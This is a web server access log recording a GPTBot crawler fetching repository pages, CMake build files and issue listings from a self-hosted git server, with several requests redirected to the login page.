[Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:18:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:18:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13312] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13319] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13315] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13319] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13309] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13321] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 10245] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13611] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23181] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:18:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:13:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:13:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:18:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13912] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13911] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 